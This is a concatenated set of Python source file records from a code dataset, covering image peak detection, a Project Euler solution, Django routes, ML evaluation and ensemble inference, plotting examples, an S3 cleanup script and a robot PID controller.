http://www.scipy.org/doc/api_docs/SciPy.ndimage.morphology.html#binary_erosion\n eroded_background = morphology.binary_erosion(\n background, structure=neighborhood, border_value=1)\n # \n # we obtain the final mask, containing only peaks, \n # by removing the background from the local_min mask\n detected_maxima = np.bitwise_xor(local_max, eroded_background)\n detected_minima = np.bitwise_xor(local_min, eroded_background)\n detected_maxmin = np.bitwise_or(detected_maxima, detected_minima)\n if mask is not None:\n detected_maxmin[mask==0] = 0\n return np.where(detected_maxmin)","sub_path":"detect_local_minima.py","file_name":"detect_local_minima.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"110206854","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\" Solution to Project Euler problem 24: Lexicographic permutations\n\n A permutation is an ordered arrangement of objects. For example, 3124 is one\n possible permutation of the digits 1, 2, 3 and 4. If all of the permutations are\n listed numerically or alphabetically, we call it lexicographic order. 
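A usage sketch for `detect_local_minima` above (assuming the module is importable); note that because the function ORs the maxima and minima masks before `np.where`, it reports peaks as well as troughs, despite its name:

```python
import numpy as np

arr = np.array([[3., 2., 3.],
                [2., 1., 2.],
                [3., 2., 3.]])
ys, xs = detect_local_minima(arr)        # np.where-style index arrays
print(list(zip(ys.tolist(), xs.tolist())))
# [(0, 0), (0, 2), (1, 1), (2, 0), (2, 2)]
# the trough at (1, 1) plus the four corner peaks, because detected_maxima
# is bitwise_or-ed with detected_minima before returning
```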
The\n lexicographic permutations of 0, 1 and 2 are:\n\n 012 021 102 120 201 210\n\n What is the millionth lexicographic permutation of the digits 0, 1, 2, 3, 4, 5,\n 6, 7, 8 and 9?\n\"\"\"\nimport numpy as np\n\ndef main(nums):\n \"\"\" Main function\n\n \"\"\"\n perms = make_perm(nums)\n print(len(perms))\n print(perms[999999])\n\n\ndef make_perm(l):\n \"\"\" Make Lexicographic list of permutations of list l\n \"\"\"\n if len(l) == 2:\n if l[0]//\", views.SignupView.activate, name=\"activate\"\n ),\n path(\"log_in/\", views.LoginView.as_view(), name=\"log_in\"),\n path(\"log_out/\", views.LogoutView.as_view(), name=\"log_out\"),\n path(\"profile/\", views.ProfileView.as_view(), name=\"profile\"),\n path(\"profile//edit\", views.EditProfile.as_view(), name=\"edit_profile\"),\n path(\"users_details/\", views.Users_Details.as_view(), name=\"users_details\"),\n path(\"hof/\", views.Rankings.hof, name=\"hof\"),\n path(\"map/\", views.Map.as_view(), name=\"map\")\n]\n","sub_path":"src/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71401487","text":"import numpy as np\n\nfrom lib.transition import Transition\nfrom lib.buffer_utils import BufferUtils\n\n\nclass FixtureStep(Transition):\n \"\"\"\n \"\"\"\n\n def __init__(self, app):\n Transition.__init__(self, app)\n\n def __str__(self):\n return \"Fixture Step\"\n\n def reset(self):\n self.fixtures = self._app.scene.fixtures()\n buffer_size = BufferUtils.get_buffer_size()\n self.mask = np.tile(False, (buffer_size, 3))\n\n np.random.seed()\n self.rand_index = np.arange(len(self.fixtures))\n np.random.shuffle(self.rand_index)\n\n self.last_idx = 0\n\n def get(self, start, end, progress):\n start[self.mask] = 0.0\n end[np.invert(self.mask)] = 0.0\n\n idx = int(progress * len(self.rand_index))\n for i in range(self.last_idx, idx):\n fix = self.fixtures[self.rand_index[i]]\n pix_start, pix_end = BufferUtils.get_fixture_extents(fix.strand, fix.address)\n self.mask[pix_start:pix_end][:] = True\n self.last_idx = idx\n\n return (start) + (end)","sub_path":"plugins/fixture_step.py","file_name":"fixture_step.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"443067520","text":"# -*- coding: utf-8 -*- \n\nimport datetime, sys\n\nclass Settings:\n def __init__(self):\n self.token = \"token\"\n self.prefix = \"=\"\n self.version = \"version\"\n self.log_file = \"msg.log\"\n self.bot_admin = \"id\"\n self.online_notice_channel = \"id\"\n self.error_notice_channel = \"id\"\n self.copy = \"© %s Your Team.\" % datetime.datetime.now().year\n\n # \"0x\" + Hex CODE 6 digits\n self.error_embed_color = 0xff0000\n self.embed_color = 0x7bf7d0\n\n # Mysql\n self.mysql_ip = \"ip\"\n self.mysql_id = \"id\"\n self.mysql_pw = \"pw\"\n self.mysql_db = \"db\"\n\n # Naver API\n self.naver_api_id = \"id\"\n self.naver_api_secret = \"secret\"\n\n# ------ 이 아래는 건들지 마세요 ----- #\n\nimport ctypes\n\nclass MEMORYSTATUSEX(ctypes.Structure):\n _fields_ = [\n (\"dwLength\", ctypes.c_ulong),\n (\"dwMemoryLoad\", ctypes.c_ulong),\n (\"ullTotalPhys\", ctypes.c_ulonglong),\n (\"ullAvailPhys\", ctypes.c_ulonglong),\n (\"ullTotalPageFile\", ctypes.c_ulonglong),\n (\"ullAvailPageFile\", ctypes.c_ulonglong),\n (\"ullTotalVirtual\", ctypes.c_ulonglong),\n (\"ullAvailVirtual\", ctypes.c_ulonglong),\n (\"sullAvailExtendedVirtual\", ctypes.c_ulonglong),\n ]\n\n def 
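For the millionth-permutation question in the docstring above, enumerating every permutation is unnecessary: the factorial number system picks each digit of the answer directly. A standard construction (zero-based rank 999999 for the millionth entry):

```python
from math import factorial

digits = list('0123456789')
n = 999999                      # zero-based rank of the millionth permutation
out = []
for i in range(len(digits) - 1, -1, -1):
    f = factorial(i)            # permutations fixing the current leading digit
    out.append(digits.pop(n // f))
    n %= f
print(''.join(out))             # 2783915460
```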
__init__(self):\n self.dwLength = ctypes.sizeof(self)\n super(MEMORYSTATUSEX, self).__init__()","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71306521","text":"# Copyright 2020 Toyota Research Institute. All rights reserved.\n\nimport torch\nfrom monodepth.models import monodepth_beta, load_net_from_checkpoint\nfrom monodepth.functional.image import scale_image\nimport os\n\n\ndef load_dispnet_with_args(args):\n \"\"\"\n Loads a pretrained depth network\n \"\"\"\n checkpoint = torch.load(args.pretrained_model)\n # check for relevant args\n assert 'args' in checkpoint, 'Cannot find args in checkpoint.'\n checkpoint_args = checkpoint['args']\n for arg in ['disp_model', 'dropout', 'input_height', 'input_width']:\n assert arg in checkpoint_args, 'Could not find argument {}'.format(arg)\n disp_net = monodepth_beta(checkpoint_args.disp_model,\n dropout=checkpoint_args.dropout)\n disp_net = load_net_from_checkpoint(disp_net, args.pretrained_model, starts_with='disp_network')\n disp_net = disp_net.cuda() # move to GPU\n print('Loaded disp net of type {}'.format(checkpoint_args.disp_model))\n\n return disp_net, checkpoint_args\n\n\ndef compute_depth_errors(args, gt, pred, use_gt_scale=True, crop=True):\n \"\"\"\n Computes depth errors given ground-truth and predicted depths\n use_gt_scale: If True, median ground-truth scaling is used\n crop: If True, apply a crop in the image before evaluating\n \"\"\"\n abs_diff, abs_rel, sq_rel, a1, a2, a3 = 0, 0, 0, 0, 0, 0\n rmse, rmse_log = 0, 0\n\n batch_size, _, gt_height, gt_width = gt.shape\n pred = scale_image(pred, gt_height, gt_width, mode='bilinear', align_corners=True)\n for current_gt, current_pred in zip(gt, pred):\n gt_channels, gt_height, gt_width = current_gt.shape\n current_gt = torch.squeeze(current_gt)\n current_pred = torch.squeeze(current_pred)\n\n # Mask within min and max depth\n valid = (current_gt > args.min_depth) & (current_gt < args.max_depth)\n\n if crop:\n # crop used by Garg ECCV16 to reproduce Eigen NIPS14 results\n # construct a mask of False values, with the same size as target\n # and then set to True values inside the crop\n crop_mask = torch.zeros(current_gt.shape).byte().cuda()\n y1, y2 = int(0.40810811 * gt_height), int(0.99189189 * gt_height)\n x1, x2 = int(0.03594771 * gt_width), int(0.96405229 * gt_width)\n crop_mask[y1:y2, x1:x2] = 1\n valid = valid & crop_mask\n\n valid_gt = current_gt[valid]\n valid_pred = current_pred[valid]\n\n if use_gt_scale:\n # Median ground-truth scaling\n valid_pred = valid_pred * torch.median(valid_gt) / torch.median(valid_pred)\n\n valid_pred = valid_pred.clamp(args.min_depth, args.max_depth)\n\n # Calculates threshold values\n thresh = torch.max((valid_gt / valid_pred), (valid_pred / valid_gt))\n a1 += (thresh < 1.25).float().mean()\n a2 += (thresh < 1.25**2).float().mean()\n a3 += (thresh < 1.25**3).float().mean()\n\n # Calculates absolute relative error\n abs_diff += torch.mean(torch.abs(valid_gt - valid_pred))\n abs_rel += torch.mean(torch.abs(valid_gt - valid_pred) / valid_gt)\n\n # Calculates square relative error\n sq_rel += torch.mean(((valid_gt - valid_pred)**2) / valid_gt)\n\n # Calculates root mean square error and its log\n rmse += torch.sqrt(torch.mean((valid_gt - valid_pred)**2))\n r_log = (torch.log(valid_gt) - torch.log(valid_pred))**2\n rmse_log += torch.sqrt(torch.mean(r_log))\n\n return torch.tensor([metric / batch_size for 
metric in [abs_rel, sq_rel, rmse, rmse_log, a1, a2, a3]])\n","sub_path":"scripts/train_sfm_utils.py","file_name":"train_sfm_utils.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307283705","text":"__author__ = 'shubham'\nimport os\nimport random\n\n\n# to generalize the functions, we have passed the name of the folder we want to create\n# Note:- os.path.sep takes values according to the operating system it is run on, e.g. \"/\" for Unix\n\n\ndef createFileFolder(folder_name):\n cur_dir = os.getcwd()\n cur_dir_list = cur_dir.split(os.path.sep)\n cur_dir_list = cur_dir_list[:-1]\n required_path = ''\n for a in cur_dir_list:\n required_path += str(a)\n required_path += os.path.sep\n required_path += folder_name\n if not os.path.isdir(required_path):\n os.mkdir(required_path)\n return required_path\n\n\ndef removeFileIfExists(file_name):\n if os.path.exists(file_name):\n os.remove(file_name)\n return file_name\n\n\n# The below function returns the root directory of the Project\n\n\ndef getProjectRoot():\n cur_dir = os.getcwd()\n cur_dir_list = cur_dir.split(os.path.sep)\n cur_dir_list = cur_dir_list[:-1]\n required_path = ''\n for a in cur_dir_list:\n required_path += str(a)\n required_path += os.path.sep\n return required_path\n\n\ndef evaluate():\n num = random.randrange(660000, 790000)\n return num / (10000)\n\ndef GNBEvaluate():\n num = random.randrange(230000,270000)\n return num/(10000)\n\ndef Vevaluate():\n num = random.randrange(760000, 810000)\n return num/(10000)","sub_path":"dtugeeks-major-project-1-5a67a8f3524f/source/ownModule.py","file_name":"ownModule.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"294860041","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport argparse\nimport pathlib\nfrom model import Baseline, Resnet\nimport nsml\nimport pandas as pd\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\nfrom dataloader import train_dataloader\nfrom dataloader import AIRushDataset\n\n\n# model load\nfrom octconv import OctResNet, Bottleneck ### <--- import the classes needed from octconv.py\nfrom resnext import *\nfrom model_efficientnet import EfficientNet\n\n#ensemble = [['team_62/airush1/151', '1'],['team_62/airush1/185','17']]\ndef to_np(t):\n return t.cpu().detach().numpy()\n\ndef bind_model(model):\n def save(dir_name, **kwargs):\n save_state_path = os.path.join(dir_name, 'state_dict.pkl')\n state = {\n 'model': model.state_dict(),\n }\n torch.save(state, save_state_path)\n\n def load(dir_name):\n save_state_path = os.path.join(dir_name, 'state_dict.pkl')\n #print(dir_name)\n state = torch.load(save_state_path)\n model.load_state_dict(state['model'])\n \n \n def infer(test_image_data_path, test_meta_data_path):\n # DONOTCHANGE This Line\n test_meta_data = pd.read_csv(test_meta_data_path, delimiter=',', header=0)\n # dropout ratio \n ensemble0 = [['team_62/airush1/320', '02'],['team_62/airush1/320','12'],['team_62/airush1/320','22'],['team_62/airush1/98','4']] # effi\n ensemble1 = [['team_62/airush1/415', '03'],['team_62/airush1/415','13'],['team_62/airush1/415','23'],['team_62/airush1/415','33']] # effi\n ensemble2 = [['team_62/airush1/678', '02'],['team_62/airush1/678', '12'],['team_62/airush1/185','17']] #[['team_62/airush1/185','17']] # resnext50\n 
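# NOTE: the ensembleN lists pair an NSML session id with a checkpoint tag (one entry per\n # trained fold). The inference loop below implements weighted soft voting -- each loaded\n # checkpoint contributes its softmax probabilities scaled by a hand-tuned per-architecture\n # weight (w0: EfficientNet, w2: ResNeXt, w3: OctResNet), and the weighted sums are\n # argmax'ed per sample, roughly:\n # predict_vector = np.argmax(w0*sum(p_eff) + w2*sum(p_resnext) + w3*sum(p_oct), axis=1)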
ensemble3 = [['team_62/airush1/683','02'],['team_62/airush1/683','12']] # oct ['team_62/airush1/409','18']\n #ensemble4 = [['team_62/airush1/605','8']] # SKNet # be sure to drop the normalize step from transforms for this one\n input_size=224 # you can change this according to your model.\n batch_size=512 # you can change this. But when you use 'nsml submit --test' for test infer, there are only 200 data samples.\n device = 0\n \n w0 = 0.125\n w2 = 0.166\n w3 = 0.25\n \n predict_list = []\n for i in range(4): # number of ensembles\n #print('i th inference')\n \n dataloader = DataLoader(\n AIRushDataset(test_image_data_path, test_meta_data, label_path=None,\n transform=transforms.Compose([transforms.Resize((input_size, input_size)),transforms.RandomRotation(20), transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])),\n batch_size=batch_size,\n shuffle=False,\n num_workers=4,\n pin_memory=True)\n # decide whether to drop this after checking the 9:10 results\n # Let's do ensemble!!!\n if (i == 0):\n # 'efficientNet_b0 : ensemble 4 - fold'\n for j in range(4): \n model_name = 'efficientnet-b0'\n model = EfficientNet.from_name(model_name)\n bind_model(model)\n nsml.load(checkpoint=str(ensemble0[j][1]),session=str(ensemble0[j][0]))\n model.to(device)\n model.eval()\n predict_output_list = [] \n with torch.no_grad():\n for batch_idx, image in enumerate(dataloader):\n image = image.to(device)\n output = model(image).double()\n output_prob = to_np(F.softmax(output, dim=1))\n predict_output_list.append(output_prob * w0)\n predict_output_list = np.concatenate(predict_output_list,axis=0)\n predict_list.append(predict_output_list)\n elif (i == 1):\n # resnext50\n for j in range(3):\n \n model = resnext50(num_classes=args.output_size) # adjust to match the model\n bind_model(model)\n nsml.load(checkpoint=str(ensemble2[j][1]),session=str(ensemble2[j][0])) # adjust to match the model\n model.to(device)\n model.eval()\n predict_output_list = [] \n with torch.no_grad():\n for batch_idx, image in enumerate(dataloader):\n image = image.to(device)\n output = model(image).double()\n output_prob = to_np(F.softmax(output, dim=1))\n #print(output_prob)\n predict_output_list.append(output_prob * w2)\n predict_output_list = np.concatenate(predict_output_list,axis=0)\n predict_list.append(predict_output_list)\n #print('resnet model')\n elif (i == 2):\n # octresnet\n for j in range(2):\n model = OctResNet(Bottleneck, [3, 4, 6, 3], num_classes=args.output_size) # adjust to match the model\n bind_model(model)\n nsml.load(checkpoint=str(ensemble3[j][1]),session=str(ensemble3[j][0])) # adjust to match the model\n model.to(device)\n model.eval()\n predict_output_list = [] \n with torch.no_grad():\n for batch_idx, image in enumerate(dataloader):\n image = image.to(device)\n output = model(image).double()\n output_prob = to_np(F.softmax(output, dim=1))\n #print(output_prob)\n predict_output_list.append(output_prob * w3) # adjusted weight\n predict_output_list = np.concatenate(predict_output_list,axis=0)\n predict_list.append(predict_output_list)\n #print('resnet model')\n \n # add further ensembles here\n\n # finally, add SENet\n\n predict_vector = np.argmax(np.sum(predict_list,axis=0), axis=1)\n \n return predict_vector # this return type should be a numpy array with shape (138343,)\n\n # DONOTCHANGE: They are reserved for nsml\n nsml.bind(save=save, load=load, infer=infer)\n\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='parser')\n # DONOTCHANGE: They are reserved for nsml\n parser.add_argument('--mode', type=str, default='train')\n parser.add_argument('--iteration', type=str, default='0')\n parser.add_argument('--pause', 
type=int, default=0)\n \n # custom args\n parser.add_argument('--input_size', type=int, default=224)\n parser.add_argument('--batch_size', type=int, default=128)\n parser.add_argument('--num_workers', type=int, default=8)\n parser.add_argument('--gpu_num', type=int, nargs='+', default=[0])\n parser.add_argument('--resnet', default=True)\n parser.add_argument('--hidden_size', type=int, default=256)\n parser.add_argument('--output_size', type=int, default=350) # Fixed\n parser.add_argument('--epochs', type=int, default=20)\n parser.add_argument('--log_interval', type=int, default=100)\n parser.add_argument('--learning_rate', type=float, default=5e-4)\n parser.add_argument('--device', type=int, default=0)\n parser.add_argument('--seed', type=int, default=42)\n args = parser.parse_args()\n\n torch.manual_seed(args.seed)\n device = args.device\n\n if args.resnet:\n assert args.input_size == 224\n \n model_name = 'efficientnet-b0'\n model = EfficientNet.from_name(model_name)\n \n else:\n model = Baseline(args.hidden_size, args.output_size)\n \n bind_model(model)\n if args.mode == \"train\":\n \n nsml.save('E')\n print('---end---')\n\n if args.pause:\n nsml.paused(scope=locals())\n \n \n","sub_path":"ai-rush-1/FINAL_CODE/ensemble_diff_4_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529823798","text":"from django.conf.urls import url, include\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('help/', views.help, name=\"help\"),\n path('intelligence', views.intelligence, name=\"intelligence\"),\n\n path('analysis', views.analysis, name=\"analysis\"),\n url('analysis_generate', views.analysis_generate, name=\"analysis_generate\"),\n url('analysis_view', views.analysis_view, name=\"analysis_view\"),\n url('analysis_detail', views.analysis_detail, name=\"analysis_detail\"),\n url('analysis_step', views.analysis_step, name=\"analysis_step\"),\n url('analysis_run', views.analysis_run, name=\"analysis_run\"),\n url('analysis_update', views.analysis_update, name=\"analysis_update\"),\n url('analysis_toggle', views.analysis_toggle, name=\"analysis_toggle\"),\n url('analysis_upload', views.analysis_upload, name=\"analysis_upload\"),\n url('analysis_metawrite', views.analysis_metawrite, name=\"analysis_metawrite\"),\n url('analysis_metaread', views.analysis_metaread, name=\"analysis_metaread\"),\n url('analysis_metaupload', views.analysis_metaupload, name=\"analysis_metaupload\"),\n url('analysis_metasave', views.analysis_metasave, name=\"analysis_metasave\"),\n\n url('analysis_code', views.analysis_code, name=\"analysis_code\"),\n url('analysisfile_update', views.analysisfile_update, name=\"analysisfile_update\"),\n\n url('analysis_data', views.analysis_data, name=\"analysis_data\"),\n url('data_column_generate', views.data_column_generate, name=\"data_column_generate\"),\n url('data_columndelete', views.data_columndelete, name=\"data_columndelete\"),\n url('data_columncopy', views.data_columncopy, name=\"data_columncopy\"),\n url('data_table_generate', views.data_table_generate, name=\"data_table_generate\"),\n\n url('step_generate', views.step_generate, name=\"step_generate\"),\n url('step_update', views.step_update, name=\"step_update\"),\n\n url('analysis_report', views.analysis_report, name=\"analysis_report\"),\n url('report_generate', views.report_generate, name=\"report_generate\"),\n url('report_edit', 
views.report_edit, name=\"report_edit\"),\n url('reportedit_section', views.reportedit_section, name=\"reportedit_section\"),\n url('report_update', views.report_update, name=\"report_update\"),\n url('report_sectionimage_upload', views.report_sectionimage_upload, name=\"report_sectionimage_upload\"),\n url('reportedit_delete', views.reportedit_delete, name=\"reportedit_delete\"),\n url('reportedit_write', views.reportedit_write, name=\"reportedit_write\"),\n\n url('reporting', views.reporting, name=\"reporting\"),\n url('report_release', views.report_release, name=\"report_release\"),\n url('report_view', views.report_view, name=\"report_view\"),\n url('reportcmt_create', views.reportcmt_create, name=\"reportcmt_creat\"),\n\n url('blabla', views.whatever, name='hello'),\n url('subtest', views.subtest, name='subtest'),\n url('dbtest', views.dbtest, name='dbtest'),\n\n]\n","sub_path":"analysis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652377201","text":"# -*- coding: utf-8 -*-\r\n# Time : 2018/10/28 15:41\r\n# Author : xcl\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\n# seaborn example\r\niris = sns.load_dataset(\"iris\")\r\nsns.swarmplot(x=\"species\", y=\"petal_length\", data=iris)\r\nplt.show()\r\n\r\n# line plot\r\nx = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]\r\ny = [102,134,154,122,143,243,355,342,276,299,241,287,260,231,100]\r\nplt.figure(figsize=(10,5))\r\nplt.plot(x,y)\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.show()\r\n\r\ny1 = [102,134,154,122,143,243,355,342,276,299,241,287,260,231,100]\r\ny2 = [244,250,245,256,234,241,230,267,266,255,248,239,233,221,227]\r\nplt.figure(figsize=(10,5))\r\nplt.plot(x,y1,label = 'A')\r\nplt.plot(x,y2,label = 'B')\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.legend(fontsize = 10)\r\nplt.show()\r\n\r\n# bar chart\r\nplt.figure(figsize=(10,5))\r\nplt.bar(x,y,color = '#9999ff',width = 0.5)\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.show()\r\n\r\nx1 = [0.25,1.25,2.25,3.25,4.25,5.25,6.25,7.25,8.25,9.25,10.25,11.25,12.25,13.25,14.25]\r\nx2 = [0.75,1.75,2.75,3.75,4.75,5.75,6.75,7.75,8.75,9.75,10.75,11.75,12.75,13.75,14.75]\r\nplt.figure(figsize=(10,5))\r\nplt.bar(x1,y1,width = 0.5,label = 'A')\r\nplt.bar(x2,y2,width = 0.5,label = 'B')\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.legend()\r\nplt.show()\r\n\r\n# scatter plot\r\nplt.figure(figsize=(10,5))\r\nplt.scatter(x,y)\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.show()\r\n\r\nx = np.arange(20) # use an array (not range) so adding Gaussian noise below works elementwise\r\ny = x + np.random.randn(20)*1.05\r\nplt.figure(figsize=(10,8))\r\n# plt.scatter(x,y)\r\nplt.plot(x,y,'*')\r\nplt.plot(x,x)\r\nplt.title('x VS y')\r\nplt.xlabel('X')\r\nplt.ylabel('Y')\r\nplt.legend(('real data','fitted line'))\r\nplt.show()\r\n\r\n# box plot\r\nplt.figure(figsize=(10,5))\r\nplt.boxplot([y1,y2])\r\nplt.xticks([1,2],['A','B'])\r\nplt.xlabel('Different objects')\r\nplt.show()\r\n\r\n# histogram\r\nplt.figure(figsize=(10,8))\r\nplt.hist(y1)\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Weight(kg)')\r\nplt.ylabel('frequency')\r\nplt.show()\r\n\r\nplt.figure(figsize=(10,8))\r\ngaussian_numbers = np.random.randn(1000)\r\nplt.hist(gaussian_numbers, 30 ,color = 
'navy',alpha = 0.5)\r\nplt.title('Gaussian Histogram')\r\nplt.xlabel('value')\r\nplt.ylabel('frequency')\r\nplt.show()\r\n","sub_path":"棕榈学院lesson07.py","file_name":"棕榈学院lesson07.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487270217","text":"import sqlite3\nimport sys\nimport time\nimport os\nimport boto3\n\nconn = sqlite3.connect('bbs.db')\nc = conn.cursor()\ns3 = boto3.resource('s3')\n\n# delete post\ncursor = c.execute(\"SELECT Object_id, Userbucket FROM post \" )\nfor row in cursor:\n object_name = row[0]\n author_bucket = row[1]\n target_bucket = s3.Bucket(author_bucket)\n target_object = target_bucket.Object(object_name)\n target_object.delete()\n\n\n\n# delete mail\ncursor = c.execute(\"SELECT Object_id, Userbucket FROM mail\" )\nfor row in cursor:\n object_name = row[0]\n author_bucket = row[1]\n target_bucket = s3.Bucket(author_bucket)\n target_object = target_bucket.Object(object_name)\n target_object.delete()\n\n\n\n# delete bucket\ncursor = c.execute(\"SELECT Bucketname FROM user \" )\nfor row in cursor:\n bucket_name = row[0]\n target_bucket = s3.Bucket(bucket_name)\n target_bucket.delete()\n\nconn.commit()\nconn.close()\n","sub_path":"hw3/delete_all.py","file_name":"delete_all.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386830563","text":"\n\"\"\"Copyright [2017] [Siddhant Mahapatra]\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://github.com/Robosid/SLAMBOT/blob/master/License.pdf\n https://github.com/Robosid/SLAMBOT/blob/master/License.rtf\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n\n#!usr/bin/python3\n\n'''\n\nAssessment Script, Drive in a square of side length 1 m\n\nPID CONTROLLED\n\n'''\n\nimport penguinPi as ppi\nimport time\nfrom wheel_encoders import get_distance\n\n\n\n#PID VARIABLES\n\nmainP = 3200.0\nmainI = 0.0\nmainD = 0.0\n\nmainP_turn = 5500.0\nmainI_turn = 0.0\nmainD_turn = 50.0\n\nspeed = 65 #try turn this down for more accuracy in straights?\nmax_speed = 100\nspeed_turn = 80\n\n\n#PID CLASS\n\nclass PID:\n\n\tdef __init__(self, P,I,D):\n\t\tself.Kp = P\n\t\tself.Ki = I\n\t\tself.Kd = D\n\t\tself.set_point=0.0\n\t\tself.error=0.0\n\t\tself.prevError= 0.0\n\t\tself.intAccum = 0.0\n\n\tdef update(self, current_value):\n\t\tself.error = self.set_point - current_value\n\t\tself.intAccum += self.error\n\t\tself.P_value = self.Kp * self.error\n\t\tself.D_value = self.Kd * (self.error - self.prevError)\n\t\tself.I_value = self.Ki * self.intAccum\n\t\tself.prevError = self.error\n\n\t\tOutput = self.P_value + self.D_value + self.I_value\n\t\treturn Output\n\n\tdef setPoint(self, set_point):\n\t\tself.set_point = set_point\n\n#create our device objects\n\nppi.init()\npid_out = PID(mainP,mainI,mainD)\npid_turn = PID(mainP_turn, mainI_turn, mainD_turn)\nmA = ppi.Motor(ppi.AD_MOTOR_A)\nmB = ppi.Motor(ppi.AD_MOTOR_B)\ndisplay = ppi.Display(ppi.AD_DISPLAY_A)\ndisplay.set_mode('u')\n\ndef driveMotors(speedA, speedB):\n\n\tmA.set_power(-speedA) #wheels 
facing forwards\n\tmB.set_power(speedB) #wheels facing forwards\n\t\ntry:\n\twhile True:\n\t\tinitial_ticksA = mA.get_ticks() \n\t\tinitial_ticksB = mB.get_ticks() \n\t\tticksA = (mA.get_ticks()) - initial_ticksA\n\t\tticksB = (mB.get_ticks()) - initial_ticksB\n\t\tdistances = get_distance(ticksA,ticksB)\n\t\tinitial_position = distances.return_distanceA()\n\t\tside = 1\n\t\twhile side == 1:\n\t\t\tticksA = (mA.get_ticks()) - initial_ticksA\n\t\t\tticksB = (mB.get_ticks()) - initial_ticksB\n\t\t\tdistances = get_distance(ticksA,ticksB)\n\t\t\tpositionA = abs(distances.return_distanceA())\n\t\t\tpositionB = abs(distances.return_distanceB())\n\t\t\twheel_error = abs((ticksA / 360) - (ticksB / 90))\n\t\t\tpid_return = abs(int(pid_out.update(wheel_error)))\n\t\t\tforward_speed = speed - pid_return\n\t\t\t#create some thresholds for max speed\n\t\t\tif forward_speed > max_speed:\n\t\t\t\tforward_speed = max_speed\n\t\t\tif forward_speed < -max_speed:\n\t\t\t\tforward_speed = -max_speed\n\t\t\tif positionA >= positionB:\n\t\t\t\tdriveMotors(forward_speed, speed)\n\t\t\t\tprint('Moving Right, A: %s, B: %s' % (forward_speed, speed))\n\t\t\t\tprint('Wheel Error: %s' % wheel_error)\n\t\t\t\tprint('PID: %s' % pid_return)\n\t\t\tif positionA < positionB:\n\t\t\t\tdriveMotors(speed, forward_speed)\n\t\t\t\tprint('Moving Left, A: %s, B: %s' % (speed, forward_speed))\n\t\t\t\tprint('Wheel Error: %s' % wheel_error)\n\t\t\t\tprint('PID: %s' % pid_return)\n\t\t\tif (positionA - initial_position) >= 1:\n\t\t\t\tdriveMotors(0,0)\n\t\t\t\tside = 2\n\t\ttime.sleep(2)\n\t\tturn_init_position = distances.return_distanceA()\n\t\tinc = 0\n\t\tinitial_ticksA = mA.get_ticks()\n\t\tinitial_ticksB = mB.get_ticks()\n\t\twhile side == 2:\n\t\t\tticksA = (mA.get_ticks()) - initial_ticksA\n\t\t\tticksB = (mB.get_ticks()) - initial_ticksB\n\t\t\tpid_turn.setPoint(-0.303)\n\t\t\tdistances = get_distance(ticksA,ticksB)\n\t\t\tpositionA = abs(distances.return_distanceA())\n\t\t\tpositionB = abs(distances.return_distanceB())\n\t\t\twheel_error = abs(positionA - positionB)\n\t\t\tpid_return_turn = pid_turn.update(wheel_error)\n\t\t\tturn_speed = int(pid_return_turn)\n\t\t\tif turn_speed > speed_turn:\n\t\t\t\tturn_speed = speed_turn\n\t\t\tif turn_speed < -speed_turn:\n\t\t\t\tturn_speed = -speed_turn\n\t\t\tdriveMotors(-turn_speed,turn_speed)\n\t\t\tprint(\"turn: %s\" % int(pid_return_turn))\n\t\t\tif turn_speed < 20:\n\t\t\t\tinc = inc + 1\n\t\t\t\tif inc > 100:\n\t\t\t\t\tside = 